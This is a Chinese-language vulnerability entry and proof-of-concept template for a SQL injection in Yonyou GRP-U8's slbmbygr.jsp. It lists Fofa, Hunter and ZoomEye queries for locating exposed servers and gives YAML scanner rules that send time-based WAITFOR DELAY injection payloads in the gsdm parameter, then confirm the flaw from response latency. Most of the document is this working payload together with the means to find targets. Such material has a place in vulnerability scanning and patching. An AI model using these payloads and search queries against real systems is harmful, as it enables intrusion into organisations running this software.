漏洞描述
在用友GRP-U8的slbmbygr.jsp 参数存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。
Fofa: app="用友-GRP-U8"
Hunter: app.name="用友GRP-U8 OA"
ZoomEye: app:"用友GRP-U8"
yonyou-grp-u8-slbmbygr-jsp-sqli: 用友GRP-U8 slbmbygr.jsp 存在sql注入漏洞
PoC代码[已公开]
id: yonyou-grp-u8-slbmbygr-jsp-sqli
info:
name: 用友GRP-U8 slbmbygr.jsp 存在sql注入漏洞
author: Y3y1ng
severity: critical
verified: true
description: |
在用友GRP-U8的slbmbygr.jsp 参数存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。
Fofa: app="用友-GRP-U8"
Hunter: app.name="用友GRP-U8 OA"
ZoomEye: app:"用友GRP-U8"
reference:
- https://mp.weixin.qq.com/s/sN1JUyPV6WP_RsQIPElYmw
tags: yonyou,u8,sqli
created: 2023/12/10
rules:
r0:
request:
method: GET
path: /u8qx/slbmbygr.jsp?gsdm=1';WAITFOR DELAY '0:0:10'--
expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
r1:
request:
method: GET
path: /u8qx/slbmbygr.jsp?gsdm=1';WAITFOR DELAY '0:0:6'--
expression: response.status == 200 && response.latency <= 8000 && response.latency >= 6000
r2:
request:
method: GET
path: /u8qx/slbmbygr.jsp?gsdm=1';WAITFOR DELAY '0:0:10'--
expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
r3:
request:
method: GET
path: /u8qx/slbmbygr.jsp?gsdm=1';WAITFOR DELAY '0:0:6'--
expression: response.status == 200 && response.latency <= 8000 && response.latency >= 6000
expression: r0() && r1() && r2() && r3()